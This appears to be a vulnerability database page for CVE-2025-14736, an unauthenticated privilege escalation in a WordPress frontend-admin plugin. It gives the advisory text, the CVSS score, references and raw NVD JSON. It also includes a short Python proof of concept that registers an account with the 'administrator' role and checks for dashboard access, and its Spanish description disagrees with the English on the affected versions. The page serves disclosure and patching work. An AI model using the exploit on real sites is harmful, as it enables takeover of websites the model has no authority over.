CVE-2025-14736

Description

The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.28.29. This is due to insufficient validation of user-supplied role values in the 'validate_value', 'pre_update_value', and 'get_fields_display' functions. This makes it possible for unauthenticated attackers to register as administrators and gain complete control of the site, granted they can access a user registration form containing a Role field.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Frontend Admin by DynamiApps < 3.28.30

Frontend Admin by DynamiApps <= 3.28.29 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-14736 PoC - WordPress Frontend Admin Privilege Escalation import requests import re TARGET_URL = "http://target-wordpress-site.com" # Find registration form with role field form_url = f"{TARGET_URL}/register/" # Adjust path as needed # Step 1: Get the page and extract necessary form fields session = requests.Session() response = session.get(form_url) # Step 2: Prepare registration payload with admin role register_data = { 'username': 'attacker_account', 'email': '[email protected]', 'password': 'P@ssw0rd123', 'confirm_password': 'P@ssw0rd123', 'role': 'administrator', # Malicious role assignment # Include other required form fields '_wpnonce': '', # Extract from form } # Step 3: Submit registration request submit_response = session.post(form_url, data=register_data) # Step 4: Verify admin access if submit_response.status_code == 200: admin_check = session.get(f"{TARGET_URL}/wp-admin/") if 'dashboard' in admin_check.text.lower() or admin_check.status_code == 200: print("[+] Privilege Escalation Successful! Admin account created.") print(f"[+] Login URL: {TARGET_URL}/wp-admin/") else: print("[-] Attack failed, check form parameters")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14736
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14736
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14736/
[4] VulDB https://vuldb.com/cve/CVE-2025-14736
[5] https://plugins.trac.wordpress.org/changeset/3427243/acf-frontend-form-element/trunk/main/frontend/fields/user/class-role.php
[6] https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3472098%40acf-frontend-form-element&new=3472098%40acf-frontend-form-element&sfp_email=&sfph_mail=
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/07eb71fc-6588-490d-8947-3077ec4a9045?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14736", "sourceIdentifier": "[email protected]", "published": "2026-01-09T07:16:01.333", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Frontend Admin by DynamiApps plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.28.29. This is due to insufficient validation of user-supplied role values in the 'validate_value', 'pre_update_value', and 'get_fields_display' functions. This makes it possible for unauthenticated attackers to register as administrators and gain complete control of the site, granted they can access a user registration form containing a Role field."}, {"lang": "es", "value": "El plugin Frontend Admin de DynamiApps para WordPress es vulnerable a una escalada de privilegios en todas las versiones hasta la 3.28.25, inclusive. Esto se debe a una validación insuficiente de los valores de rol proporcionados por el usuario en las funciones 'validate_value', 'pre_update_value' y 'get_fields_display'. Esto permite a atacantes no autenticados registrarse como administradores y obtener control total del sitio, siempre que puedan acceder a un formulario de registro de usuario que contenga un campo de Rol."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3427243/acf-frontend-form-element/trunk/main/frontend/fields/user/class-role.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3472098%40acf-frontend-form-element&new=3472098%40acf-frontend-form-element&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/07eb71fc-6588-490d-8947-3077ec4a9045?source=cve", "source": "[email protected]"}]}}